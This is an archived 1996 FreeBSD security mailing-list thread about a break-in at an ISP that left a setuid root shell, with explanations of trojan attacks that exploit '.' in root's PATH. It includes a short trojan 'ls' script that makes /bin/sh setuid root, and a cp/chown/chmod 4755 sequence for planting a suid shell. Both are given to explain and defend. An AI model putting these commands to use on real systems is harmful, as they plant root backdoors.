as they have > > a account on that machine... > > I must be a little harsh here, but I'll be diplomatic, OK? :-) > > You didn't know it was a setuid file, in fact you seemed not to know > what a setuid file was. (Am I correct?) If someone has root on your > machine, which he will have if he has a setuid shell, he has the > ability to compromise your whole (possibly weakly set up) network. > > If you do not know the basics, like setuid, you are WIDE open for this > kind of attack. Well, I know what a setuid is but didn't know it was called a setuid since it has that s in the permissions... Also, on our machine, the wheel group only has chad, jbhunt, vince and root and the only person who can login to root directly is chad at the console, we all need to su. > This shell could have been created two ways (That are currently in > popular cracker use): > > 1) The cracker snooped your root password somehow, (digging through > your desk/dustbin or by running a snooper somewhere), then created > this suid shell for future use. This isn't possible since Gaianet isn't opened to the public for people to snoop around. > 2) The Cracker made a trojan script somewhere (usually exploiting > some admins (roots) who have "." in their path). This way he creates > a script that when run as root will make him a suid program. > after this he has you by tender bits. Hmmm, doesn't everyone have . as their path since all . does is allow someone to run stuff from the current directory... > There are other ways, but these are the most popular. > > For much more info, I recommend "Practical Unix Security" from > O'Reilly and Associates, (By Garfinkel?) I have that book but there are always ways no one knows about ;) Vince From owner-freebsd-security Mon Jun 24 23:36:49 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id XAA20558 for security-outgoing; Mon, 24 Jun 1996 23:36:49 -0700 (PDT) Received: from gvr.win.tue.nl (root@gvr.win.tue.nl [131.155.210.19]) by freefall.freebsd.org (8.7.5/8.7.3) with SMTP id XAA20552; Mon, 24 Jun 1996 23:36:44 -0700 (PDT) Received: by gvr.win.tue.nl (8.6.12/1.53) id IAA18992; Tue, 25 Jun 1996 08:36:17 +0200 From: guido@gvr.win.tue.nl (Guido van Rooij) Message-Id: <199606250636.IAA18992@gvr.win.tue.nl> Subject: Re: No comment character in hosts.equiv To: danny@auscert.org.au (Danny Smith) Date: Tue, 25 Jun 1996 08:36:16 +0200 (MET DST) Cc: jkh@time.cdrom.com, hackers@freebsd.org, security@freebsd.org, ache@freebsd.org In-Reply-To: <199606242355.JAA29733@amethyst.auscert.org.au> from Danny Smith at "Jun 25, 96 09:55:12 am" X-Mailer: ELM [version 2.4ME+ PL17 (25)] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: owner-security@freebsd.org X-Loop: FreeBSD.org Precedence: bulk Danny Smith wrote: -- Start of PGP encoded section. > (Note the change of subject line!) > > "Jordan K. Hubbard" writes: > > > Hmmm. We have reason to believe that he *didn't* get root (though > > we're still assuming he did, just to be paranoid) and if the mod times > > can be trusted, hosts.equiv hasn't been touched in many months (and > > localhost is commented out). > ^^^^^^^^^^^^^^^^^^^^^^^^^^^^ > > There is no comment character in either the hosts.equiv file or the > .rhosts file. Use of this may allow someone to spoof DNS and gained > trusted access. > > Check out the code relating to calls to ruserok(). Wrong. FreeBSD has a comment char. Put in before the release of 2.1.0. Look in usr/src/lib/libc/net/rcmd.c in __ivaliduser. -Guido From owner-freebsd-security Mon Jun 24 23:41:40 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id XAA21349 for security-outgoing; Mon, 24 Jun 1996 23:41:40 -0700 (PDT) Received: from grumble.grondar.za (root@grumble.grondar.za [196.7.18.130]) by freefall.freebsd.org (8.7.5/8.7.3) with ESMTP id XAA21310; Mon, 24 Jun 1996 23:41:30 -0700 (PDT) Received: from grumble.grondar.za (mark@localhost.grondar.za [127.0.0.1]) by grumble.grondar.za (8.7.5/8.7.3) with ESMTP id IAA08093; Tue, 25 Jun 1996 08:39:37 +0200 (SAT) Message-Id: <199606250639.IAA08093@grumble.grondar.za> To: -Vince- cc: Mark Murray , hackers@FreeBSD.org, security@FreeBSD.org, Chad Shackley , jbhunt Subject: Re: I need help on this one - please help me track this guy down! Date: Tue, 25 Jun 1996 08:39:37 +0200 From: Mark Murray Sender: owner-security@FreeBSD.org X-Loop: FreeBSD.org Precedence: bulk -Vince- wrote: > > If you do not know the basics, like setuid, you are WIDE open for this > > kind of attack. > > Well, I know what a setuid is but didn't know it was called a setuid > since it has that s in the permissions... Also, on our machine, the wheel > group only has chad, jbhunt, vince and root and the only person who can > login to root directly is chad at the console, we all need to su. Ok... > > This shell could have been created two ways (That are currently in > > popular cracker use): > > > > 1) The cracker snooped your root password somehow, (digging through > > your desk/dustbin or by running a snooper somewhere), then created > > this suid shell for future use. > > This isn't possible since Gaianet isn't opened to the public for > people to snoop around. Physically, OK, but electronically? > > 2) The Cracker made a trojan script somewhere (usually exploiting > > some admins (roots) who have "." in their path). This way he creates > > a script that when run as root will make him a suid program. > > after this he has you by tender bits. > > Hmmm, doesn't everyone have . as their path since all . does is allow > someone to run stuff from the current directory... Not root! this leaves you wide open for trojans. As root you should have to type ./foo to run foo in the current directory. > > There are other ways, but these are the most popular. > > > > For much more info, I recommend "Practical Unix Security" from > > O'Reilly and Associates, (By Garfinkel?) > > I have that book but there are always ways no one knows about ;) Sure! :-) M -- Mark Murray 46 Harvey Rd, Claremont, Cape Town 7700, South Africa +27 21 61-3768 GMT+0200 Finger mark@grondar.za for PGP key From owner-freebsd-security Mon Jun 24 23:42:11 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id XAA21515 for security-outgoing; Mon, 24 Jun 1996 23:42:11 -0700 (PDT) Received: from onyx.auscert.org.au (onyx0.auscert.org.au [203.5.112.10]) by freefall.freebsd.org (8.7.5/8.7.3) with ESMTP id XAA21432; Mon, 24 Jun 1996 23:41:54 -0700 (PDT) Received: from amethyst.auscert.org.au (amethyst.auscert.org.au [203.5.112.218]) by onyx.auscert.org.au (8.7.5/8.7.1) with ESMTP id QAA11651; Tue, 25 Jun 1996 16:41:15 +1000 (EST) Received: from localhost (localhost [127.0.0.1]) by amethyst.auscert.org.au (8.7.5/8.7.2) with SMTP id QAA04407; Tue, 25 Jun 1996 16:41:12 +1000 (EST) Message-Id: <199606250641.QAA04407@amethyst.auscert.org.au> X-Authentication-Warning: amethyst.auscert.org.au: Host localhost [127.0.0.1] didn't use HELO protocol X-Mailer: exmh version 1.6.7 5/3/96 To: guido@gvr.win.tue.nl (Guido van Rooij) cc: danny@auscert.org.au (Danny Smith), jkh@time.cdrom.com, hackers@freebsd.org, security@freebsd.org, ache@freebsd.org Subject: Re: No comment character in hosts.equiv In-reply-to: Your message of "Tue, 25 Jun 1996 08:36:16 +0200." <199606250636.IAA18992@gvr.win.tue.nl> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Date: Tue, 25 Jun 1996 16:41:10 +1000 From: Danny Smith Sender: owner-security@freebsd.org X-Loop: FreeBSD.org Precedence: bulk Guido van Rooij writes: > Danny Smith wrote: > -- Start of PGP encoded section. > > (Note the change of subject line!) > > > > "Jordan K. Hubbard" writes: > > > > > Hmmm. We have reason to believe that he *didn't* get root (though > > > we're still assuming he did, just to be paranoid) and if the mod times > > > can be trusted, hosts.equiv hasn't been touched in many months (and > > > localhost is commented out). > > ^^^^^^^^^^^^^^^^^^^^^^^^^^^^ > > > > There is no comment character in either the hosts.equiv file or the > > .rhosts file. Use of this may allow someone to spoof DNS and gained > > trusted access. > > > > Check out the code relating to calls to ruserok(). > > Wrong. FreeBSD has a comment char. Put in before the release of 2.1.0. > Look in usr/src/lib/libc/net/rcmd.c in __ivaliduser. OK, I verified this on our 2.0.5 test system before mailing. Looks like I may have been hit by the "checking the previous version" problem. I haven't checked a 2.1.0 system, but will try and get to it tomorrow. Danny Smith. ========================================================================== Danny Smith | Fax: +61 7 3365 4477 AUSCERT | Phone: +61 7 3365 4417 c/- Prentice Centre | (answered during business hours) The University of Queensland | (on call after hours for emergencies) Qld. 4072. Australia | Internet: auscert@auscert.org.au From owner-freebsd-security Mon Jun 24 23:47:17 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id XAA22073 for security-outgoing; Mon, 24 Jun 1996 23:47:17 -0700 (PDT) Received: from mercury.gaianet.net (root@mercury.gaianet.net [206.171.98.26]) by freefall.freebsd.org (8.7.5/8.7.3) with ESMTP id XAA22055; Mon, 24 Jun 1996 23:47:12 -0700 (PDT) Received: (from vince@localhost) by mercury.gaianet.net (8.7.5/8.6.12) id XAA01680; Mon, 24 Jun 1996 23:46:04 -0700 (PDT) Date: Mon, 24 Jun 1996 23:46:03 -0700 (PDT) From: -Vince- To: Mark Murray cc: hackers@FreeBSD.org, security@FreeBSD.org, Chad Shackley , jbhunt Subject: Re: I need help on this one - please help me track this guy down! In-Reply-To: <199606250639.IAA08093@grumble.grondar.za> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-security@FreeBSD.org X-Loop: FreeBSD.org Precedence: bulk On Tue, 25 Jun 1996, Mark Murray wrote: > -Vince- wrote: > > > If you do not know the basics, like setuid, you are WIDE open for this > > > kind of attack. > > > > Well, I know what a setuid is but didn't know it was called a setuid > > since it has that s in the permissions... Also, on our machine, the wheel > > group only has chad, jbhunt, vince and root and the only person who can > > login to root directly is chad at the console, we all need to su. > > Ok... > > > > This shell could have been created two ways (That are currently in > > > popular cracker use): > > > > > > 1) The cracker snooped your root password somehow, (digging through > > > your desk/dustbin or by running a snooper somewhere), then created > > > this suid shell for future use. > > > > This isn't possible since Gaianet isn't opened to the public for > > people to snoop around. > > Physically, OK, but electronically? Electronically is a different story.... Since there are over 1000 users on this machine.... but we do know who hacked root access... on our other machine earth like i mentioned earlier, one person just did ypwhich to get root access but that was with 2.1R, -current seemed to fix this. > > > 2) The Cracker made a trojan script somewhere (usually exploiting > > > some admins (roots) who have "." in their path). This way he creates > > > a script that when run as root will make him a suid program. > > > after this he has you by tender bits. > > > > Hmmm, doesn't everyone have . as their path since all . does is allow > > someone to run stuff from the current directory... > > Not root! this leaves you wide open for trojans. As root you should > have to type ./foo to run foo in the current directory. Hmmm, really? It seems like almost all systems root has . for the path but if the directory for root is like read, write, execute by root only, how will they get into it? > > > There are other ways, but these are the most popular. > > > > > > For much more info, I recommend "Practical Unix Security" from > > > O'Reilly and Associates, (By Garfinkel?) > > > > I have that book but there are always ways no one knows about ;) > > Sure! :-) That's the thing like the mount_union hole, that has probably been there for ages and other people may have been using it as a backdoor for quite some time before it was discovered.... Vince From owner-freebsd-security Tue Jun 25 00:01:27 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id AAA23232 for security-outgoing; Tue, 25 Jun 1996 00:01:27 -0700 (PDT) Received: from palmer.demon.co.uk (palmer.demon.co.uk [158.152.50.150]) by freefall.freebsd.org (8.7.5/8.7.3) with ESMTP id AAA23217; Tue, 25 Jun 1996 00:01:19 -0700 (PDT) Received: from palmer.demon.co.uk (localhost [127.0.0.1]) by palmer.demon.co.uk (sendmail/PALMER-2) with ESMTP id HAA29211; Tue, 25 Jun 1996 07:58:33 +0100 (BST) To: -Vince- cc: Mark Murray , hackers@FreeBSD.ORG, security@FreeBSD.ORG, Chad Shackley , jbhunt From: "Gary Palmer" Subject: Re: I need help on this one - please help me track this guy down! In-reply-to: Your message of "Mon, 24 Jun 1996 23:32:55 PDT." Date: Tue, 25 Jun 1996 07:58:32 +0100 Message-ID: <29209.835685912@palmer.demon.co.uk> Sender: owner-security@FreeBSD.ORG X-Loop: FreeBSD.org Precedence: bulk -Vince- wrote in message ID : > Hmmm, doesn't everyone have . as their path since all . does is allow > someone to run stuff from the current directory... No, everyone does NOT have `.' in their paths! I most certainly don't, as I know that it's ALL to easy to have someone break your system security that way. Imagine if you are looking into something as root, and have `.' in your path. You go into someone elses directory, and do a `ls'. All they need is a wrapper program called `ls' in that dir which copies /bin/sh to some directory, chowns it to root, then sets the setuid bit, and THEN exec's ls with the arguments given, an BANG, there goes your system security. See the problem? It's a bit of a pain if you are doing s/w development, but it's more than repaid in security ... It's why we put up with the common complaint from newbies about not being able to run programs in their current directory, as `.' isn't in root's path by default when we ship the system. Gary -- Gary Palmer FreeBSD Core Team Member FreeBSD: Turning PC's into workstations. See http://www.FreeBSD.ORG/ for info From owner-freebsd-security Tue Jun 25 00:13:58 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id AAA24989 for security-outgoing; Tue, 25 Jun 1996 00:13:58 -0700 (PDT) Received: from grumble.grondar.za (root@grumble.grondar.za [196.7.18.130]) by freefall.freebsd.org (8.7.5/8.7.3) with ESMTP id AAA24973; Tue, 25 Jun 1996 00:13:50 -0700 (PDT) Received: from grumble.grondar.za (mark@localhost.grondar.za [127.0.0.1]) by grumble.grondar.za (8.7.5/8.7.3) with ESMTP id JAA08662; Tue, 25 Jun 1996 09:12:52 +0200 (SAT) Message-Id: <199606250712.JAA08662@grumble.grondar.za> To: -Vince- cc: Mark Murray , hackers@FreeBSD.org, security@FreeBSD.org, Chad Shackley , jbhunt Subject: Re: I need help on this one - please help me track this guy down! Date: Tue, 25 Jun 1996 09:12:50 +0200 From: Mark Murray Sender: owner-security@FreeBSD.org X-Loop: FreeBSD.org Precedence: bulk -Vince- wrote: > > > Hmmm, doesn't everyone have . as their path since all . does is allow > > > someone to run stuff from the current directory... > > > > Not root! this leaves you wide open for trojans. As root you should > > have to type ./foo to run foo in the current directory. > > Hmmm, really? It seems like almost all systems root has . for the > path but if the directory for root is like read, write, execute by root > only, how will they get into it? Example: user suspects you may be a DOS user, and are likely to try to type the "dir" or "cls" command every now and then (by mistake). In his home directory he places a script called "dir" that creates a suid shell (silently) then prints the usual "command not found" error. He then phones you, asking for support, and tries to trick you into running his script. Having "." in your path makes his trickery easier. Voila! M -- Mark Murray 46 Harvey Rd, Claremont, Cape Town 7700, South Africa +27 21 61-3768 GMT+0200 Finger mark@grondar.za for PGP key From owner-freebsd-security Tue Jun 25 00:14:45 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id AAA25140 for security-outgoing; Tue, 25 Jun 1996 00:14:45 -0700 (PDT) Received: from root.com (implode.root.com [198.145.90.17]) by freefall.freebsd.org (8.7.5/8.7.3) with ESMTP id AAA25128; Tue, 25 Jun 1996 00:14:40 -0700 (PDT) Received: from localhost (localhost [127.0.0.1]) by root.com (8.7.5/8.6.5) with SMTP id AAA03862; Tue, 25 Jun 1996 00:14:37 -0700 (PDT) Message-Id: <199606250714.AAA03862@root.com> X-Authentication-Warning: implode.root.com: Host localhost [127.0.0.1] didn't use HELO protocol To: "Gary Palmer" cc: -Vince- , Mark Murray , hackers@FreeBSD.ORG, security@FreeBSD.ORG, Chad Shackley , jbhunt Subject: Re: I need help on this one - please help me track this guy down! In-reply-to: Your message of "Tue, 25 Jun 1996 07:58:32 BST." <29209.835685912@palmer.demon.co.uk> From: David Greenman Reply-To: davidg@root.com Date: Tue, 25 Jun 1996 00:14:37 -0700 Sender: owner-security@FreeBSD.ORG X-Loop: FreeBSD.org Precedence: bulk >-Vince- wrote in message ID >: >> Hmmm, doesn't everyone have . as their path since all . does is allow >> someone to run stuff from the current directory... > >No, everyone does NOT have `.' in their paths! I most certainly don't, >as I know that it's ALL to easy to have someone break your system >security that way. Imagine if you are looking into something as root, >and have `.' in your path. You go into someone elses directory, and do >a `ls'. All they need is a wrapper program called `ls' in that dir >which copies /bin/sh to some directory, chowns it to root, then sets >the setuid bit, and THEN exec's ls with the arguments given, an BANG, >there goes your system security. Actually, this particular problem can be avoided by putting "." last in the search path rather than first. -DG David Greenman Core-team/Principal Architect, The FreeBSD Project From owner-freebsd-security Tue Jun 25 00:25:24 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id AAA26359 for security-outgoing; Tue, 25 Jun 1996 00:25:24 -0700 (PDT) Received: from mercury.gaianet.net (root@mercury.gaianet.net [206.171.98.26]) by freefall.freebsd.org (8.7.5/8.7.3) with ESMTP id AAA26339; Tue, 25 Jun 1996 00:25:20 -0700 (PDT) Received: (from vince@localhost) by mercury.gaianet.net (8.7.5/8.6.12) id AAA06126; Tue, 25 Jun 1996 00:25:02 -0700 (PDT) Date: Tue, 25 Jun 1996 00:25:02 -0700 (PDT) From: -Vince- To: Gary Palmer cc: Mark Murray , hackers@FreeBSD.ORG, security@FreeBSD.ORG, Chad Shackley , jbhunt Subject: Re: I need help on this one - please help me track this guy down! In-Reply-To: <29209.835685912@palmer.demon.co.uk> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-security@FreeBSD.ORG X-Loop: FreeBSD.org Precedence: bulk On Tue, 25 Jun 1996, Gary Palmer wrote: > -Vince- wrote in message ID > : > > Hmmm, doesn't everyone have . as their path since all . does is allow > > someone to run stuff from the current directory... > > No, everyone does NOT have `.' in their paths! I most certainly don't, > as I know that it's ALL to easy to have someone break your system > security that way. Imagine if you are looking into something as root, > and have `.' in your path. You go into someone elses directory, and do > a `ls'. All they need is a wrapper program called `ls' in that dir > which copies /bin/sh to some directory, chowns it to root, then sets > the setuid bit, and THEN exec's ls with the arguments given, an BANG, > there goes your system security. > > See the problem? It's a bit of a pain if you are doing s/w > development, but it's more than repaid in security ... It's why we put > up with the common complaint from newbies about not being able to run > programs in their current directory, as `.' isn't in root's path by > default when we ship the system. Hmmm, I see people don't have it at the beginning of their path but they do for the end even on CERFNet when they talk about security, all their defaults have . at the end.. Vince From owner-freebsd-security Tue Jun 25 00:28:25 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id AAA26612 for security-outgoing; Tue, 25 Jun 1996 00:28:25 -0700 (PDT) Received: from MindBender.HeadCandy.com (root@[199.238.225.168]) by freefall.freebsd.org (8.7.5/8.7.3) with ESMTP id AAA26603; Tue, 25 Jun 1996 00:28:21 -0700 (PDT) Received: from localhost.HeadCandy.com (michaelv@localhost.HeadCandy.com [127.0.0.1]) by MindBender.HeadCandy.com (8.7.5/8.7.3) with SMTP id AAA24988; Tue, 25 Jun 1996 00:27:00 -0700 (PDT) Message-Id: <199606250727.AAA24988@MindBender.HeadCandy.com> X-Authentication-Warning: MindBender.HeadCandy.com: Host michaelv@localhost.HeadCandy.com [127.0.0.1] didn't use HELO protocol To: -Vince- cc: Mark Murray , hackers@freebsd.org, security@freebsd.org, Chad Shackley , jbhunt Subject: Re: I need help on this one - please help me track this guy down! In-reply-to: Your message of Mon, 24 Jun 96 23:32:55 -0700. Date: Tue, 25 Jun 1996 00:27:00 -0700 From: "Michael L. VanLoon -- HeadCandy.com" Sender: owner-security@freebsd.org X-Loop: FreeBSD.org Precedence: bulk >> 2) The Cracker made a trojan script somewhere (usually exploiting >> some admins (roots) who have "." in their path). This way he creates >> a script that when run as root will make him a suid program. >> after this he has you by tender bits. > Hmmm, doesn't everyone have . as their path since all . does is allow >someone to run stuff from the current directory... Assume root has "." in its path. Hacker puts this little script in his dir, maybe also in /tmp/; it's called "ls" (imagine the coincidence), and it's executable by all: #!/bin/sh chown root /bin/sh > /dev/null 2>&1 chmod u+s,a+x /bin/sh > /dev/null 2>&1 ls $\* Then sits back and waits for the sysadmin to come along and type "ls" in one of those directories. Pop quiz: what is the result? ----------------------------------------------------------------------------- Michael L. VanLoon michaelv@HeadCandy.com --< Free your mind and your machine -- NetBSD free un*x >-- NetBSD working ports: 386+PC, Mac 68k, Amiga, Atari 68k, HP300, Sun3, Sun4/4c/4m, DEC MIPS, DEC Alpha, PC532, VAX, MVME68k, arm32... NetBSD ports in progress: PICA, others... Roll your own Internet access -- Seattle People's Internet cooperative. If you're in the Seattle area, ask me how. ----------------------------------------------------------------------------- From owner-freebsd-security Tue Jun 25 00:29:56 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id AAA26785 for security-outgoing; Tue, 25 Jun 1996 00:29:56 -0700 (PDT) Received: from mercury.gaianet.net (root@mercury.gaianet.net [206.171.98.26]) by freefall.freebsd.org (8.7.5/8.7.3) with ESMTP id AAA26765; Tue, 25 Jun 1996 00:29:51 -0700 (PDT) Received: (from vince@localhost) by mercury.gaianet.net (8.7.5/8.6.12) id AAA06441; Tue, 25 Jun 1996 00:28:35 -0700 (PDT) Date: Tue, 25 Jun 1996 00:28:34 -0700 (PDT) From: -Vince- To: Mark Murray cc: hackers@FreeBSD.org, security@FreeBSD.org, Chad Shackley , jbhunt Subject: Re: I need help on this one - please help me track this guy down! In-Reply-To: <199606250712.JAA08662@grumble.grondar.za> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-security@FreeBSD.org X-Loop: FreeBSD.org Precedence: bulk On Tue, 25 Jun 1996, Mark Murray wrote: > -Vince- wrote: > > > > Hmmm, doesn't everyone have . as their path since all . does is allow > > > > someone to run stuff from the current directory... > > > > > > Not root! this leaves you wide open for trojans. As root you should > > > have to type ./foo to run foo in the current directory. > > > > Hmmm, really? It seems like almost all systems root has . for the > > path but if the directory for root is like read, write, execute by root > > only, how will they get into it? > > Example: user suspects you may be a DOS user, and are likely to try > to type the "dir" or "cls" command every now and then (by mistake). > > In his home directory he places a script called "dir" that creates a > suid shell (silently) then prints the usual "command not found" error. > > He then phones you, asking for support, and tries to trick you into > running his script. Having "." in your path makes his trickery easier. Hmmm, that's only if we had phone support.... We don't :) but do admins really go run a program that the user said won't run? Vince From owner-freebsd-security Tue Jun 25 00:32:59 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id AAA27035 for security-outgoing; Tue, 25 Jun 1996 00:32:59 -0700 (PDT) Received: from mercury.gaianet.net (root@mercury.gaianet.net [206.171.98.26]) by freefall.freebsd.org (8.7.5/8.7.3) with ESMTP id AAA27013; Tue, 25 Jun 1996 00:32:54 -0700 (PDT) Received: (from vince@localhost) by mercury.gaianet.net (8.7.5/8.6.12) id AAA06854; Tue, 25 Jun 1996 00:32:34 -0700 (PDT) Date: Tue, 25 Jun 1996 00:32:34 -0700 (PDT) From: -Vince- To: David Greenman cc: Gary Palmer , Mark Murray , hackers@FreeBSD.ORG, security@FreeBSD.ORG, Chad Shackley , jbhunt Subject: Re: I need help on this one - please help me track this guy down! In-Reply-To: <199606250714.AAA03862@root.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-security@FreeBSD.ORG X-Loop: FreeBSD.org Precedence: bulk On Tue, 25 Jun 1996, David Greenman wrote: > >-Vince- wrote in message ID > >: > >> Hmmm, doesn't everyone have . as their path since all . does is allow > >> someone to run stuff from the current directory... > > > >No, everyone does NOT have `.' in their paths! I most certainly don't, > >as I know that it's ALL to easy to have someone break your system > >security that way. Imagine if you are looking into something as root, > >and have `.' in your path. You go into someone elses directory, and do > >a `ls'. All they need is a wrapper program called `ls' in that dir > >which copies /bin/sh to some directory, chowns it to root, then sets > >the setuid bit, and THEN exec's ls with the arguments given, an BANG, > >there goes your system security. > > Actually, this particular problem can be avoided by putting "." last in > the search path rather than first. Hmmm, that's what I've noticed is everyone having "." last on the path and not first. My .cshrc's path is actually from ref.tfs.com when it was the 386bsd days... Vince From owner-freebsd-security Tue Jun 25 00:34:29 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id AAA27225 for security-outgoing; Tue, 25 Jun 1996 00:34:29 -0700 (PDT) Received: from mercury.gaianet.net (root@mercury.gaianet.net [206.171.98.26]) by freefall.freebsd.org (8.7.5/8.7.3) with ESMTP id AAA27200; Tue, 25 Jun 1996 00:34:23 -0700 (PDT) Received: (from vince@localhost) by mercury.gaianet.net (8.7.5/8.6.12) id AAA07004; Tue, 25 Jun 1996 00:34:00 -0700 (PDT) Date: Tue, 25 Jun 1996 00:33:59 -0700 (PDT) From: -Vince- To: "Michael L. VanLoon -- HeadCandy.com" cc: Mark Murray , hackers@freebsd.org, security@freebsd.org, Chad Shackley , jbhunt Subject: Re: I need help on this one - please help me track this guy down! In-Reply-To: <199606250727.AAA24988@MindBender.HeadCandy.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-security@freebsd.org X-Loop: FreeBSD.org Precedence: bulk On Tue, 25 Jun 1996, Michael L. VanLoon -- HeadCandy.com wrote: > > >> 2) The Cracker made a trojan script somewhere (usually exploiting > >> some admins (roots) who have "." in their path). This way he creates > >> a script that when run as root will make him a suid program. > >> after this he has you by tender bits. > > > Hmmm, doesn't everyone have . as their path since all . does is allow > >someone to run stuff from the current directory... > > Assume root has "." in its path. Hacker puts this little script in > his dir, maybe also in /tmp/; it's called "ls" (imagine the > coincidence), and it's executable by all: > > #!/bin/sh > chown root /bin/sh > /dev/null 2>&1 > chmod u+s,a+x /bin/sh > /dev/null 2>&1 > ls $\* > > Then sits back and waits for the sysadmin to come along and type "ls" > in one of those directories. > > Pop quiz: what is the result? Never thought about that one.... Vince From owner-freebsd-security Tue Jun 25 00:47:28 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id AAA27850 for security-outgoing; Tue, 25 Jun 1996 00:47:28 -0700 (PDT) Received: from uu.elvisti.kiev.ua (acc0.elvisti.kiev.ua [193.125.28.132]) by freefall.freebsd.org (8.7.5/8.7.3) with ESMTP id AAA27794 for ; Tue, 25 Jun 1996 00:45:31 -0700 (PDT) Received: from office.elvisti.kiev.ua (office.elvisti.kiev.ua [193.125.28.129]) by uu.elvisti.kiev.ua (8.7.5/8.7.3) with ESMTP id KAA26999; Tue, 25 Jun 1996 10:57:39 +0300 (EET DST) Received: (from stesin@localhost) by office.elvisti.kiev.ua (8.6.12/8.ElVisti) id KAA13562; Tue, 25 Jun 1996 10:57:27 +0300 From: "Andrew V. Stesin" Message-Id: <199606250757.KAA13562@office.elvisti.kiev.ua> Subject: Re: IPFW vs. IP Filter? To: jc@irbs.com (John Capo) Date: Tue, 25 Jun 1996 10:57:26 +0300 (EET DST) Cc: taob@io.org, stesin@elvisti.kiev.ua, avalon@coombs.anu.edu.au, freebsd-security@FreeBSD.ORG In-Reply-To: <199606240009.UAA16450@irbs.irbs.com> from "John Capo" at Jun 23, 96 08:09:08 pm X-Mailer: ELM [version 2.4 PL24alpha5] Content-Type: text Sender: owner-security@FreeBSD.ORG X-Loop: FreeBSD.org Precedence: bulk Dear John, # Brian Tao writes: # > # > Do I have to unpack the source somewhere in the kernel source # > tree? ioconf.h only exists in the /sys/compile/[...] directories. # # Much work needed to run it on 2.2. I can provide patches for kernel # install if you like. as for me, I'd be very grateful to see them, that would be really nice to have IPfilter working on FreeBSD-current, too, not only with 2.1-like kernels. So if you'd be so kind to share your work, I'll appreciate this strongly. Thanks! # # John Capo jc@irbs.com # IRBS Engineering FreeBSD Servers and Workstations # (954) 792-9551 Unix/Internet Consulting - ISP Solutions # -- With best regards -- Andrew Stesin. +380 (44) 2760188 +380 (44) 2713457 +380 (44) 2713560 "You may delegate authority, but not responsibility." Frank's Management Rule #1. From owner-freebsd-security Tue Jun 25 00:58:58 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id AAA29025 for security-outgoing; Tue, 25 Jun 1996 00:58:58 -0700 (PDT) Received: from irz301.inf.tu-dresden.de (irz301.inf.tu-dresden.de [141.76.1.11]) by freefall.freebsd.org (8.7.5/8.7.3) with SMTP id AAA28544; Tue, 25 Jun 1996 00:55:16 -0700 (PDT) Received: from sax.sax.de by irz301.inf.tu-dresden.de (8.6.12/8.6.12-s1) with ESMTP id JAA21531; Tue, 25 Jun 1996 09:53:10 +0200 Received: (from uucp@localhost) by sax.sax.de (8.6.12/8.6.12-s1) with UUCP id JAA07290; Tue, 25 Jun 1996 09:53:09 +0200 Received: (from j@localhost) by uriah.heep.sax.de (8.7.5/8.6.9) id JAA17768; Tue, 25 Jun 1996 09:52:02 +0200 (MET DST) From: J Wunsch Message-Id: <199606250752.JAA17768@uriah.heep.sax.de> Subject: Re: I need help on this one - please help me track this guy down! To: security@freebsd.org Date: Tue, 25 Jun 1996 09:52:01 +0200 (MET DST) Cc: core@freebsd.org (FreeBSD core team) Reply-To: joerg_wunsch@uriah.heep.sax.de (Joerg Wunsch) In-Reply-To: <1092.835661388@critter.tfs.com> from Poul-Henning Kamp at "Jun 24, 96 05:09:48 pm" X-Phone: +49-351-2012 669 X-PGP-Fingerprint: DC 47 E6 E4 FF A6 E9 8F 93 21 E0 7D F9 12 D6 4E X-Mailer: ELM [version 2.4ME+ PL17 (25)] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: owner-security@freebsd.org X-Loop: FreeBSD.org Precedence: bulk As Poul-Henning Kamp wrote: > The binary is an ordinary shell with a setuid bit. Reminds me: many systems relinguish suidness and sgidness in a shell, our shell doesn't. Does anybody have a good reason why we should not do the same? It will of course only plug the worst hole once somebody got temporary root access, but something like cp /bin/sh ~/mysuidshell chown root ~/mysuidshell chmod 4755 ~/mysuidshell as a Troyan Horse will be unusable then. -- cheers, J"org joerg_wunsch@uriah.heep.sax.de -- http://www.sax.de/~joerg/ -- NIC: JW11-RIPE Never trust an operating system you don't have sources for. ;-) From owner-freebsd-security Tue Jun 25 01:00:44 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id BAA29331 for security-outgoing; Tue, 25 Jun 1996 01:00:44 -0700 (PDT) Received: from ns2.harborcom.net (root@ns2.harborcom.net [206.158.4.4]) by freefall.freebsd.org (8.7.5/8.7.3) with ESMTP id BAA29316 for ; Tue, 25 Jun 1996 01:00:37 -0700 (PDT) Received: from swoosh.dunn.org (swoosh.dunn.org [206.158.7.243]) by ns2.harborcom.net (8.7.4/8.6.12) with SMTP id EAA05731; Tue, 25 Jun 